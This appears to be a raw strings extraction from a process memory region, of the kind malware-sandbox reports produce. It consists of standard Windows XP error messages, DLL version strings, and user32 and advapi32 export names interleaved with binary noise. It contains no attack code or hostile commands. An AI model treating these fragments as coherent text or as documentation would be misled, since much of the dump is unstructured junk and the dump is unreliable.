The password is too complex to be converted to a LAN Manager password. The LAN Manager password returned is a NULL string.
An attempt has been made to operate on an impersonation token by a thread that is not currently impersonating a client.
Unable to update the password. The value provided as the current password is incorrect.
Unable to update the password. The value provided for the new password contains values that are not allowed in passwords.
Unable to update the password. The value provided for the new password does not meet the length, complexity, or history requirement of the domain.
Logon failure: unknown user name or bad password.
Logon failure: user account restriction. Possible reasons are blank passwords not allowed, logon hour restrictions, or a policy restriction has been enforced.
Logon failure: the specified account password has expired.
Unable to perform a security operation on an object that has no associated security.
The security account manager (SAM) or local security authority (LSA) server was in the wrong state to perform the security operation.
The domain was in the wrong state to perform the security operation.
This operation is only allowed for the Primary Domain Controller of the domain.
Unable to complete the requested operation because of either a catastrophic media failure or a data structure corruption on the disk.
The logon session is not in a state that is consistent with the requested operation.
Unable to impersonate using a named pipe until data has been read from that pipe.
The transaction state of a registry subtree is incompatible with the requested operation.
Cannot perform this operation on built-in accounts.
Cannot perform this operation on this built-in special group.
Cannot perform this operation on this built-in special user.
A cross-encrypted password is necessary to change a user password.
A cross-encrypted password is necessary to change this user password.
There is no user session key for the specified logon session.
Mutual Authentication failed. The server's password is out of date at the domain controller.
This operation can not be performed on the current domain.
Hot key is already registered.
Class still has open windows.
Hot key is not registered.
This list box does not support tab stops.
Child windows cannot have menus.
All handles to windows in a multiple-window position structure must have the same parent.
The paging file is too small for this operation to complete.
Invalid keyboard layout handle.
This operation requires an interactive window station.
This operation returned because the timeout period expired.
The event log file has changed between read operations.
The Windows Installer Service could not be accessed. This can occur if you are running Windows in safe mode, or if the Windows Installer is not correctly installed. Contact your support personnel for assistance.
The configuration data for this product is corrupt. Contact your support personnel.
This installation package cannot be installed by the Windows Installer service. You must install a Windows service pack that contains a newer version of the Windows Installer service.
SQL query syntax invalid or unsupported.
This installation package could not be opened. Verify that the package exists and that you can access it, or contact the application vendor to verify that this is a valid Windows Installer package.
This installation package could not be opened. Contact the application vendor to verify that this is a valid Windows Installer package.
There was an error starting the Windows Installer service user interface. Contact your support personnel.
The language of this installation package is not supported by your system.
Function could not be executed.
Function failed during execution.
Data of this type is not supported.
The Windows Installer service failed to start. Contact your support personnel.
This installation package is not supported by this processor type. Contact your product vendor.
This patch package could not be opened. Verify that the patch package exists and that you can access it, or contact the application vendor to verify that this is a valid Windows Installer patch package.
This patch package could not be opened. Contact the application vendor to verify that this is a valid Windows Installer patch package.
This patch package cannot be processed by the Windows Installer service. You must install a Windows service pack that contains a newer version of the Windows Installer service.
Invalid command line argument. Consult the Windows Installer SDK for detailed command line help.
The requested operation completed successfully. The system will be restarted so the changes can take effect.
The upgrade patch cannot be installed by the Windows Installer service because the program to be upgraded may be missing, or the upgrade patch may update a different version of the program. Verify that the program to be upgraded exists on your computer an
The RPC protocol sequence is not supported.
Not enough resources are available to complete this operation.
The RPC server is too busy to complete this operation.
The remote procedure call failed and did not execute.
The transfer syntax is not supported by the RPC server.
The universal unique identifier (UUID) type is not supported.
The name syntax is not supported.
The server endpoint cannot perform the operation.
No interfaces have been exported.
There is nothing to unexport.
The requested operation is not supported.
A floating-point operation at the RPC server caused a division by zero.
A null context handle was passed from the client to the host during a remote procedure call.
The binding handles passed to a remote procedure call do not match.
A null reference pointer was passed to the stub.
The supplied user buffer is not valid for the requested operation.
The specified port is unknown.
The requested authentication level is not supported.
The error specified is not a valid Windows RPC error code.
Invalid operation on the encoding/decoding handle.
The RPC pipe object is invalid or corrupted.
An invalid operation was attempted on an RPC pipe object.
Unsupported RPC pipe version.
The user's password must be changed before logging on the first time.
The object exporter specified was not found.
Invalid asynchronous RPC call handle for this operation.
The RPC pipe object has already been closed.
The RPC call completed before all pipes were processed.
No more data is available from the RPC pipe.
Not all object UUIDs could be exported to the specified entry.
Interface could not be exported to the specified entry.
The window style or class attribute is invalid for this operation.
The requested metafile operation is not supported.
The requested transformation operation is not supported.
The requested clipping operation is not supported.
The network connection was made successfully, but the user had to be prompted for a password other than the one originally specified.
The requested operation is not allowed when there are jobs queued to the printer.
The requested operation is successful. Changes will not be effective until the system is rebooted.
The requested operation is successful. Changes will not be effective until the service is restarted.
The importation from the file failed.
The GUID passed was not recognized as valid by a WMI data provider.
The instance name passed was not recognized as valid by a WMI data provider.
The data item ID passed was not recognized as valid by a WMI data provider.
The medium currently exists in an offline library and must be online to perform this operation.
The operation cannot be performed on an offline library.
The library, drive, or media pool must be empty to perform this operation.
A resource required for this operation is disabled.
The drive cannot be cleaned or does not support cleaning.
The resource required for this operation does not exist.
The operation identifier is not valid.
The operator or administrator has refused the request.
The transport cannot access the medium.
Unable to retrieve status about the transport.
Cannot use the transport because it is already in use.
Unable to open or close the inject/eject port.
The media type cannot be removed from this library since at least one drive in the library reports it can support this media type.
The remote storage service is not operational at this time.
A cluster node is not available for this operation.
The operation could not be completed because the cluster group is not online.
The operation could not be completed because the cluster resource is online.
The group or resource is not in the correct state to perform the requested operation.
A cluster network is not available for this operation.
All cluster nodes must be running to perform this operation.
A node is in the process of joining the cluster.
A cluster join operation is not in progress.
This operation cannot be performed on the cluster resource as it the quorum resource. You may not bring the quorum resource offline or modify its possible owners list.
The cluster node is not ready to perform the requested operation.
The cluster join operation was aborted.
The cluster join operation failed due to incompatible software versions between the joining node and its sponsor.
The system configuration changed during the cluster join or form operation. The join or form operation was aborted.
The specified node does not support a resource of this type. This may be due to version inconsistencies or due to the absence of the resource DLL on this node.
The specified resource name is not supported by this resource DLL. This may be due to a bad (or changed) name supplied to the resource DLL.
The join operation failed because the cluster database sequence number has changed or is incompatible with the locker node. This may happen during a join operation if the cluster database was changing during the join.
The resource monitor will not allow the fail operation to be performed while the resource is in its current state. This may happen if the resource is in a pending state.
An operation was attempted that is incompatible with the current membership state of the node.
The join operation failed because the cluster instance ID of the joining node does not match the cluster instance ID of the sponsor node.
This computer cannot be made a member of a cluster because it does not have the correct version of Windows installed.
There are no EFS keys defined for the user.
The specified file is not in the defined EFS export format.
The server is not trusted for remote encryption operation.
Recovery policy configured for this system contains invalid recovery certificate.
The encryption algorithm used on the source file needs a bigger key buffer than the one on the destination file.
The disk partition does not support file encryption.
A registry key for event logging could not be created for this session.
A close operation is pending on the session.
The MODEM.INF file was not found.
The modem name was not found in MODEM.INF.
Transport driver error
The requested operation cannot be completed because the terminal connection is currently busy processing a connect, disconnect, reset, or delete operation.
An attempt has been made to connect to a session whose video mode is not supported by the current client.
DOS graphics mode is not supported.
The requested operation can be performed only on the system console.
Disconnecting the console session is not supported.
Reconnecting a disconnected session to the console is not supported.
The remote control of the console was terminated because the display mode was changed. Changing the display mode in a remote control session is not supported.
The requested operation could not be performed because the directory service is not the master for that type of operation.
The requested operation did not satisfy one or more constraints associated with the class of the object.
The directory service can perform the requested operation only on a leaf object.
The directory service cannot perform the requested operation on the RDN attribute of an object.
The requested cross-domain move operation could not be performed.
An operations error occurred.
The requested authentication method is not supported by the server.
The server does not support the requested critical extension.
The operation affects multiple DSAs
The server is not operational.
The specified method is not supported.
The specified control is not supported by the server.
The add replica operation cannot be performed. The naming context must be writable in order to create the replica.
The attribute specified in the operation is not present on the object.
Illegal modify operation. Some aspect of the modification is not permitted.
The operation must be performed at a master DSA.
The operation could not be performed because the object's parent is either uninstantiated or deleted.
The operation cannot be performed because child objects exist. This operation can only be performed on a leaf object.
The operation is out of scope.
The operation cannot continue because the object is in the process of being removed.
The operation can only be performed on an internal master DSA object.
Insufficient access rights to perform the operation.
The operation cannot be performed on a back link.
The operation could not be performed because the directory service is shutting down.
The requested FSMO operation failed. The current FSMO holder could not be contacted.
Subtree notifications are only supported on NC heads.
The requested delete operation could not be performed.
The global catalog verification failed. The global catalog is not available or does not support the operation. Some part of the directory is currently not available.
The replication operation failed because of a schema mismatch between the servers involved.
The operation cannot replace the hidden record.
This directory server is shutting down, and cannot take ownership of new floating single-master operation roles.
The directory service is missing mandatory configuration information, and is unable to determine the ownership of floating single-master operation roles.
The directory service was unable to transfer ownership of one or more floating single-master operation roles to other servers.
The replication operation failed.
An invalid parameter was specified for this replication operation.
The directory service is too busy to complete the replication operation at this time.
The distinguished name specified for this replication operation is invalid.
The naming context specified for this replication operation is invalid.
The distinguished name specified for this replication operation already exists.
The replication operation encountered a database inconsistency.
The server specified for this replication operation could not be contacted.
The replication operation encountered an object with an invalid instance type.
The replication operation failed to allocate memory.
The replication operation encountered an error with the mail system.
The replication operation encountered a database error.
The requested operation is not supported by this version of the directory service.
The replication operation failed due to a collision of object names.
The replication operation failed because a required parent object is missing.
The replication operation was preempted.
The replication operation was terminated because the system is shutting down.
The server specified for this replication operation was contacted, but that server was unable to contact an additional server needed to complete the operation.
The version of the Active Directory schema of the source forest is not compatible with the version of Active Directory on this computer. You must upgrade the operating system on a domain controller in the source forest before this computer can be added as a domain controller to that forest.
The requested operation requires a directory service, and none was available.
The requested search operation is only supported for base searches.
The schema update operation tried to add a backward link attribute that has no corresponding forward link.
Source and destination for the cross-domain move operation are identical. Caller should use local move operation instead of cross-domain move operation.
Another operation which requires exclusive access to the PDC FSMO is already in progress.
A cross-domain move operation failed such that two versions of the moved object exist - one each in the source and destination domains. The destination object needs to be removed to restore the system to a consistent state.
The directory cannot validate the proposed naming context name because it does not hold a replica of the naming context above the proposed naming context. Please ensure that the domain naming master role is held by a server that is configured as a global catalog server, and that the server is up to date with its replication partners. (Applies only to Windows 2000 Domain Naming masters)
The operation can not be performed because the server does not have an infrastructure container in the domain of interest.
The replica/child install failed to read the objectVersion attribute in the SCHEMA section of the file schema.ini in the system32 directory.
Only DSAs configured to be Global Catalog servers should be allowed to hold the Domain Naming Master FSMO role. (Applies only to Windows 2000 servers)
The DSA operation is unable to proceed because of a DNS lookup failure.
The object requested was not found, but an object with that key was found.
The syntax of the linked attribute being added is incorrect. Forward links can only have syntax 2.5.5.1, 2.5.5.7, and 2.5.5.14, and backlinks can only have syntax 2.5.5.1
Security Account Manager needs to get the boot password.
Security Account Manager needs to get the boot key from floppy disk.
The operation requires that destination domain auditing be enabled.
The operation couldn't locate a DC for the source domain.
The replication operation could not be completed due to a schema incompatibility.
The replication operation could not be completed due to a previous schema incompatibility.
The replication update could not be applied because either the source or the destination has not yet received information regarding a recent cross-domain move operation.
The requested operation can be performed only on a global catalog server.
The operation requires that source domain auditing be enabled.
A Filter was passed that uses constructed attributes.
Your computer could not be joined to the domain. You have exceeded the maximum number of computer accounts you are allowed to create in this domain. Contact your system administrator to have this limit reset or increased.
For security reasons, the operation must be run on the destination DC.
Critical Directory Service System objects cannot be deleted during tree delete operations. The tree delete may have been partially performed.
This version of Windows is too old to support the current directory forest behavior. You must upgrade the operating system on this server before it can become a domain controller in this forest.
This version of Windows is too old to support the current domain behavior. You must upgrade the operating system on this server before it can become a domain controller in this domain.
This version of Windows no longer supports the behavior version in use in this directory forest. You must advance the forest behavior version before this server can become a domain controller in the forest.
This version of Windows no longer supports the behavior version in use in this domain. You must advance the domain behavior version before this server can become a domain controller in the domain.
The version of Windows is incompatible with the behavior version of the domain or forest.
The sort order requested is not supported.
Unable to continue operation because multiple conflicting controls were used.
Rename or move operations on naming context heads or read-only objects are not allowed.
Move operations on objects in the schema naming context are not allowed.
The requested action is not supported on standard server.
The directory service cannot perform the requested operation because the servers
Operation not allowed on a disabled cross ref.
Schema update failed: Duplicate msDS-INtId. Retry the operation.
The remote create cross reference operation failed on the Domain Naming Master FSMO. The operation's error is in the extended data.
DNS request not supported by name server.
DNS operation refused.
DNS bad key.
Try DNS operation again later.
The operation requested is not permitted on a DNS root server.
Invalid operation for DNS zone.
The operation cannot be performed because this zone is shutdown.
TCP/IP network protocol not installed.
A blocking operation was interrupted by a call to WSACancelBlockingCall.
A non-blocking socket operation could not be completed immediately.
A blocking operation is currently executing.
An operation was attempted on a non-blocking socket that already had an operation in progress.
An operation was attempted on something that is not a socket.
A required address was omitted from an operation on a socket.
A protocol was specified in the socket function call that does not support the semantics of the socket type requested.
An unknown, invalid, or unsupported option or level was specified in a getsockopt or setsockopt call.
The support for the specified socket type does not exist in this address family.
The attempted operation is not supported for the type of object referenced.
Only one usage of each socket address (protocol/network address/port) is normally permitted.
A socket operation encountered a dead network.
A socket operation was attempted to an unreachable network.
The connection has been broken due to keep-alive activity detecting a failure while the operation was in progress.
An operation on a socket could not be performed because the system lacked sufficient buffer space or because a queue was full.
A socket operation failed because the destination host was down.
A socket operation was attempted to an unreachable host.
A Windows Sockets implementation may have a limit on the number of applications that may use it simultaneously.
The Windows Sockets version requested is not supported.
The specified transport mode filter already exists.
The specified transport mode filter does not exist.
The requested lookup key was not found in any active activation context.
The transport filter is pending deletion.
IKE failed to find valid machine certificate
Certificate Revocation Check failed
Invalid certificate key usage
Invalid certificate type
No private key associated with machine certificate
Peer's certificate did not have a public key
Error processing Cert payload
Error processing Certificate Request payload
Peer failed to send valid machine certificate
Certification Revocation check of peer's certificate failed
Failed to load SECURITY.DLL.
Unsupported ID
Invalid certificate signature
The lifetime value received in the Responder Lifetime Notify is below the Windows 2000 configured minimum value. Please fix the policy on the peer machine.
Key length in certificate is too small for configured security requirements.
Lack of system resources has required isolated activation to be disabled for the current thread of execution.
Manifest Parse Error : System does not support the specified encoding.
Manifest Parse Error : Switch from current encoding to specified encoding not supported.
Assembly Protection Error : The public key for an assembly was too short to be allowed.
The storage operation should block until more data is available.
The storage operation should retry immediately.
The notified event sink will not influence the storage operation.
Drag-drop operation canceled
FORMATETC not supported
Invalid window handle passed
An asynchronous operation was specified. The operation has begun, but its outcome is not known yet.
The transaction was successfully aborted. However, this is a coordinated transaction, and some number of enlisted resources were aborted outright because they could not support abort-retaining semantics
An abort operation was already in progress.
No such interface supported
Operation aborted
The data necessary to complete this operation is not yet available.
Use of Ole1 services requiring DDE windows is disabled
The server process could not be started because the configured identity is incorrect. Check the username and password.
The operation attempted is not supported.
Unable to complete the call since there is no COM  security context inside IObjectControl.Activate.
The callee (server [not server application]) is not available and disappeared; all connections are invalid. The call may have executed.
The callee (server [not server application]) is not available and disappeared; all connections are invalid. The call did not execute.
Impersonate on unsecure calls is not supported.
Unable to obtain the Windows directory
The version of ACL format in the stream is not supported by this implementation of IAccessControl
Does not support a collection.
Wrong module kind for the operation.
Unable to perform requested operation.
Attempted an operation on an invalid object.
There is insufficient memory available to complete operation.
An error occurred during a seek operation.
A disk error occurred during a write operation.
A disk error occurred during a read operation.
There is insufficient disk space to complete operation.
Share.exe or equivalent is required for operation.
Illegal operation called on non-file based storage.
Illegal operation called on object with extant marshallings.
OLE32.DLL has been loaded at the wrong address.
Copy Protection Error - The given sector does not have a valid CSS key.
Copy Protection Error - DVD session key not established.
Need to run the object to perform this operation
There is no cache to operate on
Object is static; operation not allowed
compobj.dll is too old for the ole2.dll initialized
Not able to perform the operation because object is not given storage yet
Object doesn't support IViewObject interface
Class does not support aggregation (or class object is remote)
Could not read key from registry
Could not write key to registry
Could not find the key in the registry
A network error interrupted the operation.
There was an error in a Windows GDI call while converting the bitmap to a DIB
There was an error in a Windows GDI call while converting the DIB to a bitmap.
Operation exceeded deadline
Operation unavailable
Intermediate operation failed
User input required for operation to succeed
COM  is required for this operation, but is not installed
Task Scheduler security services are available only on Windows NT.
The task object version is either unsupported or invalid.
The task has been configured with an unsupported combination of account settings and run time options.
A retaining commit or abort is not supported
The requested isolation level is not valid or supported.
The transaction manager doesn't support an asynchronous operation for this method.
The requested semantics of retention of isolation across retaining commit and abort boundaries cannot be supported by this transaction implementation, or isoFlags was not equal to zero.
An import object for the transaction could not be found.
A time-out was specified, but time-outs are not supported.
The requested operation is already in progress for the transaction.
The Transaction Manager has disabled its support for TIP.
The transaction manager has disabled its support for remote/network transactions.
The partner transaction manager has disabled its support for remote/network transactions.
The transaction manager has disabled its support for XA transactions.
The requested operation requires that JIT be in the current context and it is not
The requested operation requires that the current context have a Transaction, and it does not
Server execution failed
Bad Key.
Key not valid for use in specified state.
Key does not exist.
Insufficient memory available for the operation.
Provider's public key is invalid.
Keyset does not exist
The keyset is not defined.
Keyset as registered is invalid.
The Keyset parameter is invalid.
The key parameters could not be set because the CSP uses fixed parameters.
The function requested is not supported
The per-message Quality of Protection is not supported by the security package
The certificate chain was issued by an authority that is not trusted.
An unknown error occurred while processing the certificate.
The received certificate has expired.
The other end of the security negotiation is requires strong crypto but it is not supported on the local machine.
The client cert name does not matches the user name or the KDC name is incorrect.
The encryption type requested is not supported by the KDC.
An unsupported preauthentication mechanism was presented to the kerberos package.
The requested operation requires delegation to be enabled on the machine.
The received certificate was mapped to multiple accounts.
SEC_E_NO_KERB_KEY
An error occurred while performing an operation on a cryptographic message.
The streamed cryptographic message requires more data to complete the decode operation.
An error occurred during encode or decode operation.
The specified certificate is self signed.
The previous certificate or CRL context was deleted.
The certificate does not have a property that references a private key.
Cannot find the certificate and private key for decryption.
Cannot find the certificate and private key to use for decryption.
The certificate is revoked.
No Dll or exported function was found to verify revocation.
The revocation function was unable to check revocation for the certificate.
The certificate is not in the revocation server's database.
The string contains an invalid X500 name attribute key, oid, value or delimiter.
The dwValueType for the CERT_NAME_VALUE is not one of the character strings. Most likely it is either a CERT_RDN_ENCODED_BLOB or CERT_TDN_OCTED_STRING.
The Put operation can not continue. The file needs to be resized. However, there is already a signature present. A complete signing operation must be done.
The cryptographic operation failed due to a local security option setting.
No DLL or exported function was found to verify subject usage.
The subject was not found in a Certificate Trust List (CTL).
None of the signers of the cryptographic message or certificate trust list is trusted.
The public key's algorithm parameters are missing.
OSS Certificate encode/decode error code base
OSS ASN.1 Error: Unsupported BER indefinite-length encoding.
ASN1 Certificate encode/decode error code base.
ASN1 function not supported for this PDU.
The request's current status does not allow this operation.
The certification authority's certificate contains invalid data.
Certificate service has been suspended for a database restore operation.
The certificate contains an encoded length that is potentially incompatible with older enrollment software.
The operation is denied. The user has multiple roles assigned and the certification authority is configured to enforce role separation.
The operation is denied. It can only be performed by a certificate manager that is allowed to manage certificates for the current requester.
Cannot archive private key. The certification authority is not configured for key archival.
Cannot archive private key. The certification authority could not verify one or more key recovery certificates.
The request is incorrectly formatted. The encrypted private key must be in an unauthenticated attribute in an outermost signature.
The request contains an invalid renewal certificate attribute.
An attempt was made to open a Certification Authority database session, but there are already too many active sessions. The server may need to be configured to allow additional sessions.
The permissions on this certification authority do not allow the current user to enroll for certificates.
The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
The requested certificate template is not supported by this CA.
The request contains no certificate template information.
The request is missing a required private key for archival by the server.
The request was made on behalf of a subject other than the caller. The certificate template must be configured to require at least one signature to authorize the request.
The request template version is newer than the supported template version.
The request includes a private key for archival by the server, but key archival is not enabled for the specified certificate template.
The public key does not meet the minimum size required by the specified certificate template.
The key is not exportable.
You cannot add the root CA certificate into your local store.
The key archival hash attribute was not found in the response.
An unexpetced key archival hash attribute was found in the response.
There is a key archival hash mismatch between the request and the response.
Signing certificate cannot include SMIME extension.
The certificate for the signer of the message is invalid or not found.
The signature of the certificate can not be verified.
The timestamp signature and/or certificate could not be verified or is malformed.
A certificate's basic constraint extension has not been observed.
The certificate does not meet or contain the Authenticode financial extensions.
The file did not pass the hints check.
Failed on a file operation (open, map, read, write).
The trust verification action specified is not supported by the specified trust provider.
The form specified for the subject is not one supported or known by the specified trust provider.
A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.
The validity periods of the certification chain do not nest correctly.
A certificate that can only be used as an end-entity is being used as a CA or visa versa.
A path length constraint in the certification chain has been violated.
A certificate contains an unknown extension that is marked 'critical'.
A certificate being used for a purpose other than the ones specified by its CA.
A parent of a given certificate in fact did not issue that child certificate.
A certificate is missing or has an empty value for an important field, such as a subject or issuer name.
A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider.
An internal certificate chaining error has occurred.
A certificate was explicitly revoked by its issuer.
The certification path terminates with the test root which is not trusted with the current policy settings.
The revocation process could not continue - the certificate(s) could not be checked.
The certificate's CN name does not match the passed value.
The certificate is not valid for the requested usage.
The certificate was explicitly marked as untrusted by the user.
A certification chain processed correctly, but one of the CA certificates is not trusted by the policy provider.
The certificate has invalid policy.
The certificate has an invalid name. The name is not included in the permitted list or is explicitly excluded.
The requested device registry key does not exist.
The operation cannot be performed on a device information element that has not been registered.
The operation does not require any files to be copied.
The operation cannot be performed because the device information set is locked.
The operation cannot be performed because the device information element is locked.
The operation cannot be performed because the file queue is locked.
The operation cannot be performed because the device interface is currently active.
The operation cannot be performed because the device interface has been removed from the system.
The driver selected for this device does not support Windows XP.
The driver selected for this device does not support Windows.
Operation not allowed in WOW64.
The operation involving unsigned file copying was rolled back, so that a system restore point could be set.
An INF was copied into the Windows INF directory in an improper manner.
The operation requires a Smart Card, but no Smart Card is currently in the device.
The operation has been aborted to allow the server application to exit.
The reader driver does not meet minimal requirements for support.
The smart card does not meet minimal requirements for support.
The requested order of object creation is not supported.
This smart card does not support the requested feature.
The requested certificate does not exist.
The requested certificate could not be obtained.
A communications error with the smart card has been detected. Retry the operation.
The requested key container does not exist on the smart card.
The identity or password set on the application is not valid
The DLL does not support the components listed in the TypeLib
The server catalog version is not supported
This operation can not be performed on the system application
This operation is not enabled on this platform
Application Proxy is not exportable
System application is not exportable
Can not subscribe to this component (the component may have been imported)
The partition cannot be exported, because one or more components in the partition have the same file name
Applications that contain one or more imported components cannot be installed into a non-base partition
The COM  Catalog Server threw an exception during execution
MSMQ is required for the requested operation and is not installed
Unable to marshal an interface that does not support IPersistStream
The ProgID provided to the copy operation is invalid. The ProgID is in use by another registered CLSID.
Only Application Files (*.MSI files) can be installed into partitions.
Applications containing one or more legacy components may not be exported to 1.0 format.
The SID filtering operation removed all SIDs.
Windows NT BASE API Client DLL
5.1.2600.5512 (xpsp.080413-2111)
Windows
Operating System
5.1.2600.5512
$$$$Guinea$Republic of Guinea)$$$$Guyana$Cooperative Republic of Guyana
$$$$Panama$Republic of Panama $$$$Portugal$Portuguese Republic:$$$$Papua New Guinea$Independent State of Papua New Guinea
$$$$Turkey$Republic of Turkey
$$$860 (OEM - Portuguese)
Portuguese (Brazil)$Brazil $$$1047 (IBM EBCDIC - Latin-1/Open System)
Turkish$Turkey
Portuguese (Portugal)$Portugal

%original file name%.exe_1612_rwx_01E30000_0008E000:




.text
`.data
.rsrc
@.reloc
GDI32.dll
KERNEL32.dll
NTDLL.DLL
ImmProcessKey
USER32.dll
ActivateKeyboardLayout
ArrangeIconicWindows
CallMsgFilter
CallMsgFilterA
CallMsgFilterW
CascadeChildWindows
CascadeWindows
CliImmSetHotKey
CloseWindowStation
CreateDialogIndirectParamA
CreateDialogIndirectParamAorW
CreateDialogIndirectParamW
CreateWindowStationA
CreateWindowStationW
DisableProcessWindowsGhosting
DisplayExitWindowsWarnings
EnumChildWindows
EnumDesktopWindows
EnumThreadWindows
EnumWindowStationsA
EnumWindowStationsW
EnumWindows
ExitWindowsEx
GetAsyncKeyState
GetKeyNameTextA
GetKeyNameTextW
GetKeyState
GetKeyboardLayout
GetKeyboardLayoutList
GetKeyboardLayoutNameA
GetKeyboardLayoutNameW
GetKeyboardState
GetKeyboardType
GetProcessWindowStation
LoadKeyboardLayoutA
LoadKeyboardLayoutEx
LoadKeyboardLayoutW
LockWindowStation
MapVirtualKeyA
MapVirtualKeyExA
MapVirtualKeyExW
MapVirtualKeyW
MsgWaitForMultipleObjects
MsgWaitForMultipleObjectsEx
OemKeyScan
OpenWindowStationA
OpenWindowStationW
RegisterHotKey
SetConsoleReserveKeys
SetKeyboardState
SetProcessWindowStation
SetWindowStationUser
SetWindowsHookA
SetWindowsHookExA
SetWindowsHookExW
SetWindowsHookW
TileChildWindows
TileWindows
UnhookWindowsHook
UnhookWindowsHookEx
UnloadKeyboardLayout
UnlockWindowStation
UnregisterHotKey
VkKeyScanA
VkKeyScanExA
VkKeyScanExW
VkKeyScanW
WINNLSGetIMEHotkey
keybd_event
=.cmd
=.pif
=.lnk
=.com
=.bat
F\ FTP
s.RPRP
tcPV
*9]0t#SSh
u.KKt*
~,SSSh
SSSSh
SSSh$6A~P
6SSSSh
t>SSh`
u"SSh`
ADVAPI32.dll
MSIMG32.dll
POWRPROF.dll
WINSTA.dll
RegCreateKeyExW
RegCloseKey
RegDeleteKeyW
ReportEventW
RegQueryInfoKeyW
ntdll.dll
GetViewportOrgEx
SetViewportOrgEx
GetViewportExtEx
GetCPInfo
GetSystemWindowsDirectoryW
NtQueryKey
NtEnumerateValueKey
NtYieldExecution
NtCreateKey
NtSetValueKey
NtDeleteValueKey
NtEnumerateKey
NtOpenKey
NtQueryValueKey
user32.pdb
windows.hlp
cOXY/P.Z0.0.QR00/ZPP0000000/0PPZR.BI@/DE0,
$$$006666
&$%Uooqkezs
['$$#%&(4
2<===@@=
0 00@0[0
0V0
9œ9S9|9
;";&;*;.;2;6;:;
8$8-858E8L8S8Z8a8h8o8v8}8
;(;7;>;};
2$3 363@3
;#<)<4<:<
7 8$8(8,8|8
IMM32.DLL
SETUPAPI.DLL
&%d %ws
Control Panel\Input Method\Hot Keys
Virtual Key
Key Modifiers
kbdus.dll
\Registry\Machine\System\CurrentControlSet\Control\Keyboard Layouts\
$winnt$.inf
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Font Drivers
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Fonts
Keyboard Layout\Preload
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\LastFontSweep
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Type 1 Installer\Type 1 Fonts
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Type 1 Installer\Upgraded Type1
keyboardlayout.ini
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Type 1 Installer\LastType1Sweep
\Windows\WindowStations
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Windows
\Windows
Keyboard Layout
kbdkor.dll
kbdjpn.dll
\Registry\Machine\System\CurrentControlSet\Control\Keyboard Layout
imm32.dll
Hot Keys
00000409
x:\...\
OLE32.DLL
%SystemRoot%\System32\user32.dll
Software\Microsoft\Windows\CurrentVersion\Reliability
hh.exe
indicdll.dll
\Registry\Machine\System\CurrentControlSet\Control\Keyboard Layout\
IgnoreRemoteKeyboardLayout
\Registry\Machine\Software\Microsoft\Windows\CurrentVersion\Reliability
\snapshot.dll
Windows XP USER API Client DLL
5.1.2600.5512 (xpsp.080413-2105)
Windows
Operating System
5.1.2600.5512
Error Instrument: ProcessName: %1 WindowTitle: %2 MsgCaption: %3 MsgText: %4 CallerModuleName: %5 BaseAddr: %6 ImageSize: %7 ReturnAddr: %8
Zero width &joiner
Zero width &non-joiner
&More Windows...gInsufficient memory to create the bitmap. Close one or more applications to increase available memory.
Op&en Soft Keyboard
Close So&ft Keyboard
Windows
Other people are logged on to this remote computer. Shutting down Windows might cause them to lose data. Also, someone at the remote location will have to restart the computer manually.
Other people are logged on to this computer. Shutting down Windows might cause them to lose data.
Other people are logged on to this computer. Restarting Windows might cause them to lose data.
Hardware: Maintenance (Planned)"Hardware: Installation (Unplanned) Hardware: Installation (Planned)%Operating System: Upgrade (Unplanned)#Operating System: Upgrade (Planned)
-Operating System: Reconfiguration (Unplanned) Operating System: Reconfiguration (Planned)
8A restart or shutdown to service hardware on the system.AA restart or shutdown to begin or complete hardware installation.6A restart or shutdown to upgrade the operating system.CA restart or shutdown to change the operating system configuration.BA restart or shutdown to troubleshoot an unresponsive application.>A restart or shutdown to troubleshoot an unstable application.0A restart or shutdown to service an application. A shutdown or restart for an unknown reason1The computer displayed a blue screen crash event.
The system became unresponsive.GA restart or shutdown to perform planned maintenance on an application.

%original file name%.exe_1612_rwx_01EC0000_00097000:




.text
`.data
.rsrc
@.reloc
KERNEL32.dll
NTDLL.DLL
RPCRT4.dll
ADVAPI32.dll
CryptDeriveKey
CryptDestroyKey
CryptDuplicateKey
CryptExportKey
CryptGenKey
CryptGetKeyParam
CryptGetUserKey
CryptHashSessionKey
CryptImportKey
CryptSetKeyParam
ElfReportEventA
ElfReportEventW
EncryptedFileKeyInfo
FreeEncryptedFileKeyInfo
FreeEncryptionCertificateHashList
GetEventLogInformation
GetMultipleTrusteeOperationA
GetMultipleTrusteeOperationW
GetServiceKeyNameA
GetServiceKeyNameW
GetWindowsAccountDomainSid
ImpersonateNamedPipeClient
MSChapSrvChangePassword
MSChapSrvChangePassword2
QueryWindows31FilesMigration
RegCloseKey
RegCreateKeyA
RegCreateKeyExA
RegCreateKeyExW
RegCreateKeyW
RegDeleteKeyA
RegDeleteKeyW
RegEnumKeyA
RegEnumKeyExA
RegEnumKeyExW
RegEnumKeyW
RegFlushKey
RegGetKeySecurity
RegLoadKeyA
RegLoadKeyW
RegNotifyChangeKeyValue
RegOpenKeyA
RegOpenKeyExA
RegOpenKeyExW
RegOpenKeyW
RegOverridePredefKey
RegQueryInfoKeyA
RegQueryInfoKeyW
RegReplaceKeyA
RegReplaceKeyW
RegRestoreKeyA
RegRestoreKeyW
RegSaveKeyA
RegSaveKeyExA
RegSaveKeyExW
RegSaveKeyW
RegSetKeySecurity
RegUnLoadKeyA
RegUnLoadKeyW
ReportEventA
ReportEventW
SaferiIsExecutableFileType
SetUserFileEncryptionKey
SynchronizeWindows31FilesAndWindowsNTRegistry
WmiExecuteMethodA
WmiExecuteMethodW
PSSSSSSh
PSSSSSSh#
PSSSSSSh
PSSSSSSh
(PSSSSSSh
0PSSSSSSh
8PSSSSSSh
wSSSSSSh
PSSSSSSh!
CPDuplicateKey
CPGetUserKey
CPHashSessionKey
CPImportKey
CPExportKey
CPGetKeyParam
CPSetKeyParam
CPDestroyKey
CPDeriveKey
CPGenKey
kernel32.dll
PSSSh
PSShZ
CloseWindowStation
GetProcessWindowStation
MsgWaitForMultipleObjects
8.YYu
TermsrvSetKeySecurity
TermsrvRestoreKey
TermsrvDeleteKey
